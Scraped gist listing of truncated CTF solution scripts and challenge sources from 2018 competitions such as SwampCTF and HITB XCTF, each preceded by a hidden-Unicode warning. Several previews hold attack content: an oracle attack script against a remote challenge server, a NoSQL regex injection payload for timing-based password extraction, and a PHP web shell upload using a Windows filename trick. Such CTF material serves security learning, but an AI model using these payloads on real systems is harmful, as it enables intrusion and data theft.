This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# SwampCTF 2018 - Locked Dungeon | |
# https://play.swampctf.com/ | |
import argparse | |
from hashlib import sha256 | |
from Crypto.Cipher import AES | |
import os | |
import sys |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var express = require('express') | |
var app = express() | |
var bodyParser = require('body-parser') | |
app.use(bodyParser.urlencoded({})); | |
var path = require("path"); | |
var moment = require('moment'); | |
var MongoClient = require('mongodb').MongoClient; | |
var url = "mongodb://localhost:27017/"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import string | |
s = remote('chal1.swampctf.com', 1450) | |
flag='' | |
for j in xrange(1,60): | |
s.send('a'*(47-len(flag))+'\n') | |
checker = s.recvline().strip() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author LongCat & Bongtrop | |
import string | |
import requests | |
import urllib | |
# username=admin&password=y&|hex_md5(.)(.)y.(.)....this.password_(\w%2b)|=$2%3d%3d$2$2+%26%26+this.password_$4[0]%3d%3d%3d'1+%26%26+sleex$1100$3+%26%26+$2$2%3d%3d$2 | |
flag='' | |
for char_counter in xrange(0,100): | |
for characters in string.letters+string.digits+"{}": |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2.7 | |
from hashlib import sha256, md5 | |
from Crypto.Cipher import AES | |
import os | |
import random | |
from binascii import hexlify, unhexlify | |
from base64 import b64decode, b64encode | |
import sys |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<title>Login</title> | |
<style> | |
/*@import url(https://fonts.googleapis.com/css?family=Cutive+Mono);*/ | |
body { | |
background: #456; | |
font-family: 'Consolas', sans-serif; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author LongCat (Pichaya Morimoto) | |
import requests, string | |
# On Windows OS move_uploaded_file function will convert "foo.php" | |
# followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\) back to "foo.php". | |
# http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/ | |
files = {'file': ('pwn.php ','<?php if(isset($_POST[0])){ eval($_POST[0]); }else{ phpinfo(); } ?>')} | |
values = {'submit': 'upload'} | |
phpshell = requests.post('http://47.90.97.18:9999/upload.php', files=files, data=values).text.strip(u'\ufeff').strip() | |
print phpshell |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Python's revenge | |
# This is a easy python sandbox, can you bypass it and get the flag? | |
# https://hitbxctf2018.xctf.org.cn/contest_challenge/ | |
from __future__ import unicode_literals | |
from flask import Flask, request, make_response, redirect, url_for, session | |
from flask import render_template, flash, redirect, url_for, request | |
from werkzeug.security import safe_str_cmp | |
from base64 import b64decode as b64d | |
from base64 import b64encode as b64e | |
from hashlib import sha256 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
akka-actor_2.10-2.3.16.jar | |
akka-remote_2.10-2.3.16.jar | |
scala-library_2.10.0.jar | |
config-1.3.0.jar | |
protobuf-java-2.6.1.jar | |
netty-3.10.6.Final.jar | |
*/ | |
package akkaexploit; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -- 0ps CTF ‘easy user manage system’ task – web (Race Condition bug) | |
# https://whit3hat.com/2018/04/05/0ps-ctf-easy-management-web/ | |
# https://whit3hat.com/wp-content/uploads/2018/04/solve.py | |
from flask import Flask, request | |
import time | |
import socket | |
from os import urandom, remove | |
import requests | |
import urllib | |
import threading |